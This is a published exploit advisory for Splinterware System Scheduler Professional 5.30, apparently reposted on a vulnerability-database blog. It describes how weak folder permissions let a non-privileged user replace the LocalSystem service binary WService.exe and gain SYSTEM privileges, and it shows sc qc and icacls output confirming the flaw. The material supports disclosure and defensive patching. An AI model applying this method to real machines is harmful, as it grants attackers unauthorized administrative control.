Sunday, May 30, 2021

Splinterware System Scheduler Professional 5.30 - Privilege Escalation

# Exploit Title: Splinterware System Scheduler Professional 5.30 - Privilege Escalation
# Date: 2021-05-11
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.splinterware.com
# Software Link: https://www.splinterware.com/download/ssproeval.exe
# Version: 5.30 Professional
# Tested on: Windows 10 Pro 20H2 x64

System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, impacting
where the service 'WindowsScheduler' calls its executable. A non-privileged user could execute arbitrary code with
elevated privileges (system level privileges as "nt authority\system") since the service runs as Local System;
renaming the WService.exe file located in the software's path and replacing it with a malicious file, the new one
will be executed after a short while.

C:\Users\test>sc qc WindowsScheduler
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: WindowsScheduler
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 0   IGNORE
        NOME_PERCORSO_BINARIO     : C:\PROGRA~2\SYSTEM~1\WService.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : System Scheduler Service
        DIPENDENZE                :
        SERVICE_START_NAME : LocalSystem

C:\Users\test>icacls C:\PROGRA~2\SYSTEM~1\
C:\PROGRA~2\SYSTEM~1\ BUILTIN\Users:(RX,W)
                      BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE)
                      NT SERVICE\TrustedInstaller:(I)(F)
                      NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                      NT AUTHORITY\SYSTEM:(I)(F)
                      NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                      BUILTIN\Administrators:(I)(F)
                      BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                      BUILTIN\Users:(I)(RX)
                      BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                      CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)
                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)

Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file

C:\Users\test>
            
 

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore